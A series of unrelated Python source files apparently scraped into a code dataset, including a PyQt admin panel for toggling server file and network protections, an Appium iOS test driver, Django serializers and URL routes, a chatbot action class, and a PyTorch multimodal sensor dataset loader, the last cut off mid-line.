url(:/images/btn_mode_off.png);\"))\n self.adminTagSafeMode.setText(_translate(\"adminTagSafeMode\", \"\", None))\n \n # 应用到服务器\n self.adminTagSafeOk = QtGui.QPushButton(self.adminTagSafeBkg)\n self.adminTagSafeOk.setGeometry(QtCore.QRect(800, 78, 140, 30))\n self.adminTagSafeOk.setObjectName(_fromUtf8(\"adminTagSafeOk\")) \n self.adminTagSafeOk.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_grey_line.png);\"))\n self.adminTagSafeOk.setText(_translate(\"adminTagSafeOk\", \"应用到服务器\", None))\n\n self.adminTagSafeCount = 7\n self.adminTagSafeTable = QtGui.QTableWidget(self.adminTagSafeBkg)\n self.adminTagSafeTable.setGeometry(QtCore.QRect(25, 122, 950, 290))\n self.adminTagSafeTable.setObjectName(_fromUtf8(\"specrc_list_widget\"))\n self.adminTagSafeTable.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_grey_line.jpg);\"))\n self.adminTagSafeTable.verticalHeader().setVisible(False)\n self.adminTagSafeTable.setEditTriggers(QtGui.QTableWidget.NoEditTriggers)\n self.adminTagSafeTable.setAlternatingRowColors(True)\n #list_widget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\n self.adminTagSafeTable.setRowCount(self.adminTagSafeCount)\n self.adminTagSafeTable.setColumnCount(4)\n self.adminTagSafeTable.setHorizontalHeaderLabels([_fromUtf8(\"功能\"),_fromUtf8(\"模式\"),_fromUtf8(\"状态\"),_fromUtf8(\"操作\")])\n self.adminTagSafeTable.setShowGrid(False)\n self.adminTagSafeTable.setColumnWidth(0, 280)\n self.adminTagSafeTable.setColumnWidth(1, 160)\n self.adminTagSafeTable.setColumnWidth(2, 260)\n self.adminTagSafeTable.setColumnWidth(3, 225)\n for i in range(0, self.adminTagSafeCount):\n self.adminTagSafeTable.setRowHeight(i, 50)\n \n self.adminTagSafeFileEtcModeText, self.adminTagSafeFileEtcOnOff, self.adminTagSafeFileEtcText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 0, '/images/admin_safe_etc.png', '禁止修改系统配置','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeFileLibModeText, self.adminTagSafeFileLibOnOff, self.adminTagSafeFileLibText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 1, '/images/admin_safe_lib.png', '禁止修改系统库文件','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeFileBinModeText, self.adminTagSafeFileBinOnOff, self.adminTagSafeFileBinText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 2, '/images/admin_safe_bin.png', '禁止修改系统程序文件','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n #self.adminTagSafeFileBootModeText, self.adminTagSafeFileBootOnOff, self.adminTagSafeFileBootText = self.AddAdminTagSafeTableItem(\\\n # self.adminTagSafeTable, 3, '/images/admin_safe_boot.png', '禁止修改系统启动文件','维护模式',\\\n # '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeNetFtpModeText, self.adminTagSafeNetFtpOnOff, self.adminTagSafeNetFtpText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 3, '/images/admin_safe_ftp.png', '禁止FTP访问','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeNetTelnetModeText, self.adminTagSafeNetTelnetOnOff, self.adminTagSafeNetTelnetText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 4, '/images/admin_safe_telnet.png', '禁止Telnet访问','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeNetMailModeText, self.adminTagSafeNetMailOnOff, self.adminTagSafeNetMailText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 5, '/images/admin_safe_email.png', '禁止POP/SMTP访问','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeNetWebModeText, self.adminTagSafeNetWebOnOff, self.adminTagSafeNetWebText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 6, '/images/admin_safe_web.png', '禁止HTTP访问','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n\n # 变量 - 安全保护\n self.adminTagSafeModeValue = 0\n self.adminTagSafeFileEtcValue = 0\n self.adminTagSafeFileLibValue = 0\n self.adminTagSafeFileBinValue = 0\n self.adminTagSafeFileBootValue = 0\n self.adminTagSafeNetFtpValue = 0\n self.adminTagSafeNetTelnetValue = 0\n self.adminTagSafeNetMailValue = 0\n self.adminTagSafeNetWebValue = 0\n\n # 获取Safe设置状态\n self.AdminSafeGetStatus()\n\n # 消息 - 标签 - 安全页\n self.connect(self.adminTagSafeMode, QtCore.SIGNAL(\"clicked()\"), self.onAdminTagSafeModeClick)\n self.connect(self.adminTagSafeTable, QtCore.SIGNAL(\"cellClicked(int,int)\"), self.onAdminTagSafeTableClick)\n self.connect(self.adminTagSafeOk, QtCore.SIGNAL(\"clicked()\"), self.onAdminTagSafeSet)\n\n\n def AddAdminTagSafeTableItem(self, tableHandle, line,\\\n c1_logoImg, c1_logoText,\\\n c2_modeText,\\\n c3_onoffImg,\\\n c4_statusText):\n # c1\n item = QtGui.QWidget()\n item.setGeometry(QtCore.QRect(0, 0, 200, 50))\n img = QtGui.QLabel(item)\n img.setGeometry(QtCore.QRect(40, 0, 45, 45))\n img.setAlignment(QtCore.Qt.AlignRight)\n img.setStyleSheet(_fromUtf8(\"image: url(:%s);\" % (c1_logoImg)))\n text = QtGui.QLabel(item)\n text.setGeometry(QtCore.QRect(120, 0, 150, 50))\n text.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignLeft)\n text.setText(_fromUtf8(\"%s\" % (c1_logoText)))\n tableHandle.setCellWidget(line, 0, item)\n \n # c2\n item = QtGui.QTableWidgetItem(_fromUtf8(c2_modeText))\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n tableHandle.setItem(line, 1, item)\n c2_modeHandle = item\n \n # 2行 3列\n item = QtGui.QWidget()\n item.setGeometry(QtCore.QRect(0, 0, 260, 50))\n img = QtGui.QLabel(item)\n img.setGeometry(QtCore.QRect(55, 10, 150, 30))\n img.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignLeft)\n img.setStyleSheet(_fromUtf8(\"border-image: url(:%s);\"%(c3_onoffImg)))\n tableHandle.setCellWidget(line, 2, item)\n c3_onoffHandle = img\n\n # 2行 4列\n item = QtGui.QTableWidgetItem(_fromUtf8(c4_statusText))\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n tableHandle.setItem(line, 3, item)\n c4_statusHandle = item\n \n return [c2_modeHandle, c3_onoffHandle, c4_statusHandle]\n\n def onAdminTagSafeModeClick(self):\n if self.adminTagSafeModeValue == 0:\n self.adminTagSafeModeValue = 1\n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_mode_on.png);\"))\n else: \n self.adminTagSafeModeValue = 0\n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_mode_off.png);\"))\n\n def onAdminTagSafeTableClick(self, line, col): \n if line == 0 and col == 2:\n if self.adminTagSafeFileEtcValue == 0:\n self.adminTagSafeFileEtcValue = 1\n self.adminTagSafeFileEtcText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileEtcOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileEtcValue = 0\n self.adminTagSafeFileEtcText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileEtcOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 1 and col == 2:\n if self.adminTagSafeFileLibValue == 0:\n self.adminTagSafeFileLibValue = 1\n self.adminTagSafeFileLibText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileLibOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileLibValue = 0\n self.adminTagSafeFileLibText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileLibOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 2 and col == 2:\n if self.adminTagSafeFileBinValue == 0:\n self.adminTagSafeFileBinValue = 1\n self.adminTagSafeFileBinText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileBinOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileBinValue = 0\n self.adminTagSafeFileBinText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileBinOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\")) \n #elif line == 3 and col == 2:\n # if self.adminTagSafeFileBootValue == 0:\n # self.adminTagSafeFileBootValue = 1\n # self.adminTagSafeFileBootText.setText(_fromUtf8(\"等待应用到服务器\"))\n # self.adminTagSafeFileBootOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n # else:\n # self.adminTagSafeFileBootValue = 0\n # self.adminTagSafeFileBootText.setText(_fromUtf8(\"等待应用到服务器\"))\n # self.adminTagSafeFileBootOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 3 and col == 2:\n if self.adminTagSafeNetFtpValue == 0:\n self.adminTagSafeNetFtpValue = 1\n self.adminTagSafeNetFtpText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetFtpOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetFtpValue = 0\n self.adminTagSafeNetFtpText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetFtpOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 4 and col == 2:\n if self.adminTagSafeNetTelnetValue == 0:\n self.adminTagSafeNetTelnetValue = 1\n self.adminTagSafeNetTelnetText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetTelnetOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetTelnetValue = 0\n self.adminTagSafeNetTelnetText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetTelnetOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 5 and col == 2:\n if self.adminTagSafeNetMailValue == 0:\n self.adminTagSafeNetMailValue = 1\n self.adminTagSafeNetMailText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetMailOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetMailValue = 0\n self.adminTagSafeNetMailText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetMailOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 6 and col == 2:\n if self.adminTagSafeNetWebValue == 0:\n self.adminTagSafeNetWebValue = 1\n self.adminTagSafeNetWebText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetWebOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetWebValue = 0\n self.adminTagSafeNetWebText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetWebOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n\n def onAdminTagSafeSet(self):\n url = 'https://%s:%s/safeset/%s' % (self._Config['Service']['IP'], self._Config['Service']['Port'], self.LoginName)\n data = {\n 'Tokey' : self.Tokey,\n 'Mode' : self.adminTagSafeModeValue,\n 'FileEtc' : self.adminTagSafeFileEtcValue,\n 'FileLib' : self.adminTagSafeFileLibValue,\n 'FileBin' : self.adminTagSafeFileBinValue,\n 'FileBoot' : self.adminTagSafeFileBootValue,\n 'NetFtp' : self.adminTagSafeNetFtpValue,\n 'NetTelnet': self.adminTagSafeNetTelnetValue,\n 'NetMail' : self.adminTagSafeNetMailValue,\n 'NetWeb' : self.adminTagSafeNetWebValue,\n }\n param = {'Data' : json.dumps(data)} \n rt = HttpsPost(url, param)\n if rt[0] == 0:\n res = rt[1]\n #print 'safeset Request Set:', data\n #print 'safeset Response Set:', res\n self._AdminSafeUpdateStaus(res)\n else:\n QtGui.QMessageBox.about(self, u\"设置\", u\"设置失败:\" + rt[1])\n \n \n def AdminSafeGetStatus(self):\n url = 'https://%s:%s/safeget/%s' % (self._Config['Service']['IP'], self._Config['Service']['Port'], self.LoginName)\n data = {\n 'Tokey' : self.Tokey,\n } \n param = {'Data' : json.dumps(data)} \n rt = HttpsPost(url, param)\n \n if rt[0] == 0:\n res = rt[1]\n #print 'safeget Request Get:', data\n #print 'safeget Response Get:', res\n self._AdminSafeUpdateStaus(res)\n else:\n QtGui.QMessageBox.about(self, u\"设置\", u\"获取设置失败:\" + rt[1])\n\n def _AdminSafeUpdateStaus(self, res):\n if res['Status'] == 0:\n self.adminTagSafeModeValue = res['Mode']\n self.adminTagSafeFileEtcValue = res['FileEtc']\n self.adminTagSafeFileLibValue = res['FileLib']\n self.adminTagSafeFileBinValue = res['FileBin']\n self.adminTagSafeFileBootValue = res['FileBoot']\n self.adminTagSafeNetFtpValue = res['NetFtp']\n self.adminTagSafeNetTelnetValue = res['NetTelnet']\n self.adminTagSafeNetMailValue = res['NetMail']\n self.adminTagSafeNetWebValue = res['NetWeb']\n # 更新数据\n self.adminTagSafeFileEtcText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeFileLibText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeFileBinText.setText(_fromUtf8(\"已应用到服务器\"))\n #self.adminTagSafeFileBootText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeNetFtpText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeNetTelnetText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeNetMailText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeNetWebText.setText(_fromUtf8(\"已应用到服务器\"))\n\n if self.adminTagSafeModeValue == 1:\n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_mode_on.png);\"))\n self.adminTagSafeFileEtcModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeFileLibModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeFileBinModeText.setText(_fromUtf8(\"保护模式\"))\n #self.adminTagSafeFileBootModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeNetFtpModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeNetTelnetModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeNetMailModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeNetWebModeText.setText(_fromUtf8(\"保护模式\"))\n else:\n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_mode_off.png);\"))\n self.adminTagSafeFileEtcModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeFileLibModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeFileBinModeText.setText(_fromUtf8(\"维护模式\"))\n #self.adminTagSafeFileBootModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeNetFtpModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeNetTelnetModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeNetMailModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeNetWebModeText.setText(_fromUtf8(\"维护模式\"))\n \n if self.adminTagSafeFileEtcValue == 1:\n self.adminTagSafeFileEtcOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileEtcOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n\n if self.adminTagSafeFileLibValue == 1:\n self.adminTagSafeFileLibOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileLibOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n\n if self.adminTagSafeFileBinValue == 1:\n self.adminTagSafeFileBinOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileBinOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n \n #if self.adminTagSafeFileBootValue == 1:\n # self.adminTagSafeFileBootOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n #else:\n # self.adminTagSafeFileBootOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n\n if self.adminTagSafeNetFtpValue == 1:\n self.adminTagSafeNetFtpOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetFtpOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n \n if self.adminTagSafeNetTelnetValue == 1:\n self.adminTagSafeNetTelnetOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetTelnetOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n \n if self.adminTagSafeNetMailValue == 1:\n self.adminTagSafeNetMailOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetMailOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n \n if self.adminTagSafeNetWebValue == 1:\n self.adminTagSafeNetWebOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetWebOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\")) \n else:\n QtGui.QMessageBox.about(self, u\"设置\", u\"获取设置失败:\" + res['ErrMsg'])\n\n\nimport images_rc\n","sub_path":"UI/admin_board_safe.py","file_name":"admin_board_safe.py","file_ext":"py","file_size_in_byte":22964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"108346787","text":"from appium import webdriver\nfrom Util.write_user_command import WriteUserCommand\nimport time\n\n# iPhone_Simulator = True\niPhone_Simulator = False\n\n\nclass BaseDriver:\n # def __init__(self, i):\n # self.write_file = WriteUserCommand()\n # self.port = self.write_file.get_value('user_info_'+str(i), 'port')\n # self.device_name = self.write_file.get_value('user_info_'+str(i), 'deviceName')\n\n def iOS_driver(self, i):\n write_file = WriteUserCommand()\n port = write_file.get_value('user_info_' + str(i), 'port')\n device_name = write_file.get_value('user_info_' + str(i), 'deviceName')\n desired_capabilities = {\n 'automationName': 'XCUITest',\n 'platformName': 'iOS'\n }\n\n if iPhone_Simulator:\n file_path = '/Users/mike/Desktop/baidu/Tomasky.app'\n desired_capabilities['deviceName'] = 'iPhone Simulator'\n desired_capabilities['platformVersion'] = '11.4'\n\n else:\n file_path = '/Users/mike/Desktop/Tomasky.app'\n desired_capabilities['udid'] = device_name\n desired_capabilities['deviceName'] = 'iPhone 6s'\n desired_capabilities['platformVersion'] = '11.4.1'\n\n desired_capabilities['app'] = file_path\n driver = webdriver.Remote(\"http://127.0.0.1:\"+port+\"/wd/hub\", desired_capabilities)\n # driver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", desired_capabilities)\n time.sleep(20)\n\n # if driver.is_app_installed('com.yodfz.FanQie'):\n # pass\n # else:\n # driver.switch_to.alert.accept()\n\n return driver\n\n def Android_driver(self):\n pass\n # xcodebuild - project\n # WebDriverAgent.xcodeproj - scheme\n # WebDriverAgentRunner - destination\n # 'id=d69d11788a251a64fc31dfbc93c9053cfca5cbca'\n # test\n\n\nif __name__ == '__main__':\n base_driver = BaseDriver()\n ios_driver = base_driver.iOS_driver(0)\n ios_driver.find_element_by_id('id_main_account').click()\n","sub_path":"FanQie/BasePy/base_driver.py","file_name":"base_driver.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"554535561","text":"from django.core.exceptions import ValidationError\nfrom django.db import transaction\nfrom rest_framework import serializers\n\nfrom apps.orders.models import Order, OrderItem\nfrom apps.products.serializers import ProductSerializer\n\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n product = ProductSerializer()\n\n\n class Meta:\n model = OrderItem\n exclude = []\n extra_kwargs = {\n 'order': {\n 'required': False\n }\n }\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n order_items = OrderItemSerializer(many=True)\n\n class Meta:\n model = Order\n exclude = []\n\n def create(self, validated_data):\n try:\n with transaction.atomic():\n order_items = validated_data.pop('order_items')\n\n order = super(OrderSerializer, self).create(validated_data)\n\n for order_item in order_items:\n OrderItem.objects.create(\n order=order,\n **order_item\n )\n\n except KeyError:\n raise ValidationError('send the data properly')\n else:\n return order\n","sub_path":"apps/orders/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"478015581","text":"from Abstract.AActionSubclasses.ActionLine import ActionLine\n\n\nclass CChangeIntent(ActionLine):\n\n def __init__(self,chatbot):\n \"\"\"\n Constructor de la Clase.\n :param chatbot: Es el ChatBot que tiene como acción la instancia de esta clase.\n \"\"\"\n self.chatbot = chatbot\n\n def exec(self,):\n \"\"\"\n Cambia la intención actual por otro ya creado.\n :return: void\n \"\"\"\n if self.chatbot.currentStructureChatBot is None:\n self.chatbot.output.exec('ERROR: No se puede cambiar de Intención porque no hay un Chatbot actual.')\n else:\n self.chatbot.showRandomResponse()\n sentence = self.chatbot.input.exec()\n if not(self.checkCancellation(sentence)):\n if not self.chatbot.isEmpty(sentence):\n self.chatbot.currentStructureChatBot.setCurrentIntent(sentence) # cambia la intención actual\n else:\n self.chatbot.output.exec('No se admiten valores vacíos.')\n\n # def checkCancellation(self,sentence):\n # if (sentence.lower() in self.listKeysWordsCancelRunning):\n # self.chatbot.output.exec('Se ha cancelado la operación.')\n # return True\n # else:\n # return False","sub_path":"Chatbots/MetaChatBot/Actions/LineClasses/ChangeIntent.py","file_name":"ChangeIntent.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"81253961","text":"\"\"\"hello_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom hello2 import views\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n url(r'^home/$', views.home, name='home'),\n url(r'^addmessage/$', views.add_message, name='add_message'),\n url(r'^home/file/$', views.file, name='file'),\n url(r'^hello/(?P\\d*)/$', views.checked_message, name='checked_message'),\n url(r'^$', TemplateView.as_view(template_name='index.html')),\n url(r'^ajax/show/$',views.showtmp),\n url(r'^ajax/show/(?P\\w*)/$',views.showtmp2),\n url(r'^test/', views.test),\n url(r'^ajax/add/$',views.add),\n url(r'^ajax/addselect/$', views.addselect),\n url(r'^serializer/message/$', views.MessageListView.as_view(), name='serializer_message'),\n url(r'Middewaretest/$', views.Middewaretest)\n #url(r'^hello/delete/(?P\\w*)/$', views.delete_user, name='deleteuser'),\n #url(r'^jinja2/$', views.jinja2, name='adduser')\n]\n\n\n","sub_path":"hello2/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"389596628","text":"import pandas as pd\nfrom PIL import Image\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import transforms\nimport os\nimport random\n\n\n\n\ndef get_n_features(sensor):\n if sensor == 'All':\n val = 8 * 8 * 32\n return val\n elif sensor == 'hand_camera':\n return 512 # 1024\n elif sensor == 'head_depth':\n return 1000 # 512\n elif sensor == 'force_torque':\n return 256\n elif sensor == 'mic':\n return 256 # 128\n\n\nclass HsrDataset(Dataset):\n def __init__(self, args, idxs, dataframe, test=False):\n self.args = args\n self.idxs = idxs\n self.dataframe = dataframe\n\n self.batch_size = args.batch_size\n\n self.unimodal = True\n self.All = False\n self.force_torque = False\n self.mic = False\n self.hand_camera = False\n self.head_depth = False\n\n if args.sensor == 'All':\n self.All = True\n self.unimodal = False\n elif args.sensor == 'force_torque':\n self.force_torque = True\n elif args.sensor == 'mic':\n self.mic = True\n elif args.sensor == 'hand_camera':\n self.hand_camera = True\n elif args.sensor == 'head_depth':\n self.head_depth = True\n\n\n\n def __len__(self):\n return len(self.idxs)\n\n def __getitem__(self, idx):\n idxs = self.idxs[idx]\n r = torch.tensor([])\n d = torch.tensor([])\n m = torch.tensor([])\n t = torch.tensor([])\n cur_rows = self.dataframe.loc[idxs[0]:idxs[2]]\n label = cur_rows['label'].tolist()\n\n # [ 0, 0, 1], [0, 1, 1], [1, 1, 1] is abnormal\n if 1 in label: # 1 == positive\n label = 1\n else: # 0 == negative\n label = 0\n\n if self.force_torque or self.All:\n hand_weight_series = cur_rows['cur_hand_weight']\n t = hand_weight_series.to_numpy()\n t = torch.from_numpy(t.astype(np.float32)) # t = torch.from_numpy(t.astype(np.float32))\n if self.mic or self.All:\n mic_df = cur_rows['mfcc00']\n for i in range(1, 16):\n if i < 10:\n mic_df = pd.concat([mic_df, cur_rows['mfcc0' + str(i)]], axis=1)\n else:\n mic_df = pd.concat([mic_df, cur_rows['mfcc' + str(i)]], axis=1)\n m = mic_df.to_numpy()\n m = torch.from_numpy(m.astype(np.float32)) # m = torch.from_numpy(m.astype(np.float32))\n if self.All:\n data_dirs = cur_rows['data_dir']\n r_img_dirs = cur_rows['cur_hand_id']\n d_img_dirs = cur_rows['cur_depth_id']\n r_sub_path = '/data/img/hand/'\n d_sub_path = '/data/img/d/'\n firstRow = True\n\n\n for r_img_dir, d_img_dir, data_dir in zip(r_img_dirs, d_img_dirs, data_dirs):\n r_img_dir = self.args.origin_datafile_path + data_dir + r_sub_path + str(int(r_img_dir)) + '.png'\n d_img_dir = self.args.origin_datafile_path + data_dir + d_sub_path + str(int(d_img_dir)) + '.png'\n\n r_im = Image.open(r_img_dir).resize((32, 32))\n r_im = np.array(r_im)\n d_im = Image.open(d_img_dir).resize((32, 32))\n d_im = np.array(d_im)\n d_im = d_im[:, :, np.newaxis] # unsqueeze\n\n if firstRow:\n firstRow = False\n r_base_im_arr = [r_im]\n d_base_im_arr = [d_im]\n\n\n else:\n r_base_im_arr = np.concatenate((r_base_im_arr, [r_im]), axis=0)\n d_base_im_arr = np.concatenate((d_base_im_arr, [d_im]), axis=0)\n\n r_base_im_arr = r_base_im_arr.transpose((0, 3, 1, 2))\n r = torch.FloatTensor(r_base_im_arr)\n\n d_base_im_arr = d_base_im_arr.transpose((0, 3, 1, 2))\n d = torch.FloatTensor(d_base_im_arr)\n\n\n if self.hand_camera:\n data_dirs = cur_rows['data_dir']\n r_img_dirs = cur_rows['cur_hand_id']\n r_sub_path = '/data/img/hand/'\n firstRow = True\n\n for r_img_dir, data_dir in zip(r_img_dirs, data_dirs):\n r_img_dir = self.args.origin_datafile_path + data_dir + r_sub_path + str(int(r_img_dir)) + '.png'\n\n r_im = Image.open(r_img_dir).resize((32, 32))\n r_im = np.array(r_im)\n\n if firstRow:\n firstRow = False\n r_base_im_arr = [r_im]\n\n\n else:\n r_base_im_arr = np.concatenate((r_base_im_arr, [r_im]), axis=0)\n\n r_base_im_arr = r_base_im_arr.transpose((0, 3, 1, 2))\n r = torch.FloatTensor(r_base_im_arr)\n\n\n if self.head_depth:\n data_dirs = cur_rows['data_dir']\n d_img_dirs = cur_rows['cur_depth_id']\n d_sub_path = '/data/img/d/'\n firstRow = True\n\n for d_img_dir, data_dir in zip(d_img_dirs, data_dirs):\n d_img_dir = self.args.origin_datafile_path + data_dir + d_sub_path + str(int(d_img_dir)) + '.png'\n\n d_im = Image.open(d_img_dir).resize((32, 32))\n d_im = np.array(d_im)\n d_im = d_im[:, :, np.newaxis] # unsqueeze\n\n if firstRow:\n firstRow = False\n d_base_im_arr = [d_im]\n else:\n d_base_im_arr = np.concatenate((d_base_im_arr, [d_im]), axis=0)\n\n d_base_im_arr = d_base_im_arr.transpose((0, 3, 1, 2))\n d = torch.FloatTensor(d_base_im_arr)\n\n return r, d, m, t, label\n\n\ndef get_loaders(args):\n # 1. get whole dataset\n full_dataframe = get_Dataframe(args)\n\n # 2. split it in to train, valid, test.\n trainset, validset, testset = split_train_test(full_dataframe, args)\n\n return DataLoader(trainset, batch_size=args.batch_size, num_workers=args.workers, shuffle=args.shuffle_batch), \\\n DataLoader(validset, batch_size=args.batch_size, 